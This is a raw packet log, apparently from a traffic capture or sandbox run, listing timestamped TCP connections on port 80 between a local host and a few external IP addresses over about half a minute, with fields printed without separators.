                                            Jul 2, 2024 08:26:47.322074890 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:47.322087049 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:47.322088003 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:47.322098017 CEST806389477.91.77.81192.168.2.4
                                            Jul 2, 2024 08:26:47.322129965 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:47.322169065 CEST6389480192.168.2.477.91.77.81
                                            Jul 2, 2024 08:26:48.095264912 CEST6389580192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:48.095598936 CEST6389380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:48.095896959 CEST6389680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:48.100219965 CEST806389585.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:48.100312948 CEST6389580192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:48.100478888 CEST6389580192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:48.100878954 CEST806389377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:48.100939989 CEST6389380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:48.101295948 CEST806389677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:48.101347923 CEST6389680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:48.101499081 CEST6389680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:48.105746984 CEST806389585.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:48.106378078 CEST806389677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:48.731944084 CEST806389585.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:48.732059956 CEST6389580192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:48.810030937 CEST806389677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:48.810262918 CEST6389680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:48.923144102 CEST6389680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:48.923479080 CEST6389780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:48.928354979 CEST806389777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:48.928448915 CEST806389677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:48.928467989 CEST6389780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:48.928509951 CEST6389680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:48.929022074 CEST6389780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:48.933780909 CEST806389777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:49.624799013 CEST806389777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:49.625507116 CEST6389780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:49.626451969 CEST6389780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:49.631267071 CEST806389777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:49.842972040 CEST806389777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:49.844249010 CEST6389780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:49.985515118 CEST6389780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:49.985846043 CEST6389880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:49.993133068 CEST806389777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:49.993345976 CEST806389877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:49.993428946 CEST6389780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:49.993448973 CEST6389880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:49.993558884 CEST6389880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:49.998795033 CEST806389877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:50.333337069 CEST6389580192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:50.709744930 CEST806389877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:50.709939003 CEST6389880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:50.710678101 CEST6389880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:50.718132973 CEST806389877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:50.937690973 CEST806389877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:50.937752008 CEST6389880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:51.047960043 CEST6389880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:51.048278093 CEST6389980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:51.055392027 CEST806389977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:51.055530071 CEST6389980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:51.055603027 CEST806389877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:51.055654049 CEST6389880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:51.055756092 CEST6389980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:51.060707092 CEST806389977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:51.745115995 CEST806389977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:51.745296001 CEST6389980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:51.746107101 CEST6389980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:51.754684925 CEST806389977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:51.967161894 CEST806389977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:51.967286110 CEST6389980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:52.079096079 CEST6389980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:52.079526901 CEST6390080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:52.084450006 CEST806390077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:52.084532976 CEST6390080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:52.084563017 CEST806389977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:52.084606886 CEST6389980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:52.084784031 CEST6390080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:52.089508057 CEST806390077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:52.809657097 CEST806390077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:52.809875965 CEST6390080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:52.810718060 CEST6390080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:52.827076912 CEST806390077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:53.042675972 CEST806390077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:53.042756081 CEST6390080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:53.157311916 CEST6390080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:53.157633066 CEST6390180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:53.162527084 CEST806390177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:53.162544966 CEST806390077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:53.162626982 CEST6390080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:53.162640095 CEST6390180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:53.162875891 CEST6390180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:53.167648077 CEST806390177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:53.851845026 CEST806390177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:53.851967096 CEST6390180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:53.854784966 CEST6390180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:53.859546900 CEST806390177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:54.071007967 CEST806390177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:54.071114063 CEST6390180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:54.173043966 CEST6390180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:54.173425913 CEST6390280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:54.181245089 CEST806390277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:54.181471109 CEST6390280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:54.181529999 CEST806390177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:54.181583881 CEST6390180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:54.181788921 CEST6390280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:54.189637899 CEST806390277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:54.876398087 CEST806390277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:54.876528025 CEST6390280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:54.877401114 CEST6390280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:54.882729053 CEST806390277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:55.097769976 CEST806390277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:55.097909927 CEST6390280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:55.204221010 CEST6390280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:55.204555988 CEST6390380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:55.209392071 CEST806390377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:55.209518909 CEST6390380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:55.209570885 CEST806390277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:55.209641933 CEST6390280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:55.209729910 CEST6390380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:55.215078115 CEST806390377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:55.915065050 CEST806390377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:55.915216923 CEST6390380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:55.916137934 CEST6390380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:55.921124935 CEST806390377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:56.142941952 CEST806390377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:56.143017054 CEST6390380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:56.251277924 CEST6390380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:56.251606941 CEST6390480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:56.256407022 CEST806390477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:56.256508112 CEST6390480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:56.256546021 CEST806390377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:56.256603003 CEST6390380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:56.256797075 CEST6390480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:56.261564016 CEST806390477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:56.960553885 CEST806390477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:56.960614920 CEST6390480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:56.961301088 CEST6390480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:56.966042995 CEST806390477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:57.180526972 CEST806390477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:57.180639029 CEST6390480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:57.282474041 CEST6390480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:57.282928944 CEST6390580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:57.287561893 CEST806390477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:57.287669897 CEST6390480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:57.287703991 CEST806390577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:57.287780046 CEST6390580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:57.287997007 CEST6390580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:57.292726040 CEST806390577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:57.990040064 CEST806390577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:57.990281105 CEST6390580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:57.990873098 CEST6390580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:57.995672941 CEST806390577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:58.209270954 CEST806390577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:58.209326982 CEST6390580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:58.313719034 CEST6390580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:58.314116001 CEST6390680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:58.318876028 CEST806390577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:58.318959951 CEST806390677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:58.318964958 CEST6390580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:58.319027901 CEST6390680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:58.319219112 CEST6390680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:58.324011087 CEST806390677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:59.019534111 CEST806390677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:59.019608021 CEST6390680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:59.020570993 CEST6390680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:59.026827097 CEST806390677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:59.242985964 CEST806390677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:59.243132114 CEST6390680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:59.348439932 CEST6390680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:59.348833084 CEST6390780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:59.353925943 CEST806390777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:59.354006052 CEST6390780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:59.354103088 CEST806390677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:26:59.354149103 CEST6390780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:59.354154110 CEST6390680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:26:59.359055996 CEST806390777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:00.057714939 CEST806390777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:00.057782888 CEST6390780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:00.058614969 CEST6390780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:00.063486099 CEST806390777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:00.278817892 CEST806390777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:00.278950930 CEST6390780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:00.391937017 CEST6390780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:00.392323971 CEST6390880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:00.399792910 CEST806390777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:00.399905920 CEST6390780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:00.399980068 CEST806390877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:00.400044918 CEST6390880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:00.400249958 CEST6390880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:00.405080080 CEST806390877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:01.116863966 CEST806390877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:01.117057085 CEST6390880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:01.117686987 CEST6390880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:01.122623920 CEST806390877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:01.344875097 CEST806390877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:01.344958067 CEST6390880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:01.464057922 CEST6390880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:01.464447975 CEST6390980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:01.469464064 CEST806390977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:01.469548941 CEST6390980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:01.469574928 CEST806390877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:01.469625950 CEST6390880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:01.478835106 CEST6390980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:01.486972094 CEST806390977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:02.163516998 CEST806390977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:02.163773060 CEST6390980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:02.168847084 CEST6390980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:02.173943996 CEST806390977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:02.384871006 CEST806390977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:02.384991884 CEST6390980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:02.501192093 CEST6390980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:02.501543045 CEST6391080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:02.506536007 CEST806391077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:02.506609917 CEST6391080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:02.506833076 CEST6391080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:02.506896019 CEST806390977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:02.506944895 CEST6390980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:02.511882067 CEST806391077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:03.200985909 CEST806391077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:03.201050043 CEST6391080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:03.201634884 CEST6391080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:03.206443071 CEST806391077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:03.422889948 CEST806391077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:03.422969103 CEST6391080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:03.532162905 CEST6391080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:03.532499075 CEST6391180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:03.539392948 CEST806391177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:03.539513111 CEST6391180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:03.539766073 CEST806391077.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:03.539798021 CEST6391180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:03.539828062 CEST6391080192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:03.545434952 CEST806391177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:04.249039888 CEST806391177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:04.249298096 CEST6391180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:04.250235081 CEST6391180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:04.256383896 CEST806391177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:04.474925041 CEST806391177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:04.475265026 CEST6391180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:04.579590082 CEST6391180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:04.580333948 CEST6391280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:04.584978104 CEST806391177.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:04.585094929 CEST6391180192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:04.585328102 CEST806391277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:04.585412979 CEST6391280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:04.585591078 CEST6391280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:04.590353966 CEST806391277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:05.279551983 CEST806391277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:05.279758930 CEST6391280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:05.280596972 CEST6391280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:05.285343885 CEST806391277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:05.494954109 CEST806391277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:05.495062113 CEST6391280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:05.610663891 CEST6391280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:05.611977100 CEST6391380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:05.617017031 CEST806391277.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:05.617072105 CEST6391280192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:05.617942095 CEST806391377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:05.618021965 CEST6391380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:05.618160963 CEST6391380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:05.623960018 CEST806391377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:06.326930046 CEST806391377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:06.327054024 CEST6391380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:06.327687025 CEST6391380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:06.332489967 CEST806391377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:06.548983097 CEST806391377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:06.549060106 CEST6391380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:06.657320976 CEST6391380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:06.657680035 CEST6391480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:06.662468910 CEST806391477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:06.662543058 CEST6391480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:06.662678957 CEST806391377.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:06.662681103 CEST6391480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:06.662734032 CEST6391380192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:06.667426109 CEST806391477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:07.349061966 CEST806391477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:07.349133015 CEST6391480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:07.349777937 CEST6391480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:07.355015993 CEST806391477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:07.564707041 CEST806391477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:07.564795971 CEST6391480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:07.673553944 CEST6391480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:07.673907995 CEST6391580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:07.678775072 CEST806391577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:07.678806067 CEST806391477.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:07.678855896 CEST6391580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:07.678884029 CEST6391480192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:07.679048061 CEST6391580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:07.683808088 CEST806391577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:08.387412071 CEST806391577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:08.387509108 CEST6391580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:08.388183117 CEST6391580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:08.392950058 CEST806391577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:08.612716913 CEST806391577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:08.612773895 CEST6391580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:08.719715118 CEST6391580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:08.720057964 CEST6391680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:08.726803064 CEST806391677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:08.726912022 CEST6391680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:08.727130890 CEST6391680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:08.728521109 CEST806391577.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:08.728585958 CEST6391580192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:08.734142065 CEST806391677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:09.450851917 CEST806391677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:09.450980902 CEST6391680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:09.451632023 CEST6391680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:09.458302975 CEST806391677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:09.680342913 CEST806391677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:09.680478096 CEST6391680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:09.787472963 CEST6391680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:09.787853956 CEST6391780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:09.793715954 CEST806391677.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:09.793854952 CEST6391680192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:09.793967009 CEST806391777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:09.794030905 CEST6391780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:09.799104929 CEST6391780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:09.805308104 CEST806391777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:10.512187958 CEST806391777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:10.512254953 CEST6391780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:10.522448063 CEST6391780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:10.528856039 CEST806391777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:10.811939955 CEST806391777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:10.812068939 CEST6391780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:10.923232079 CEST6391780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:10.923655033 CEST6391880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:10.928505898 CEST806391877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:10.928605080 CEST6391880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:10.928776026 CEST6391880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:10.929425955 CEST806391777.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:10.929491043 CEST6391780192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:10.933624983 CEST806391877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:11.610985041 CEST806391877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:11.611063957 CEST6391880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:11.611723900 CEST6391880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:11.616523981 CEST806391877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:11.826442003 CEST806391877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:11.826571941 CEST6391880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:11.938555002 CEST6391880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:11.938910961 CEST6391980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:11.943938017 CEST806391977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:11.944045067 CEST6391980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:11.944277048 CEST6391980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:11.944397926 CEST806391877.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:11.944457054 CEST6391880192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:11.949174881 CEST806391977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:12.644160032 CEST806391977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:12.644256115 CEST6391980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:12.645042896 CEST6391980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:12.651303053 CEST806391977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:12.865864038 CEST806391977.91.77.82192.168.2.4
                                            Jul 2, 2024 08:27:12.865987062 CEST6391980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:12.969937086 CEST6391980192.168.2.477.91.77.82
                                            Jul 2, 2024 08:27:12.970344067 CEST6392080192.168.2.477.91.77.82
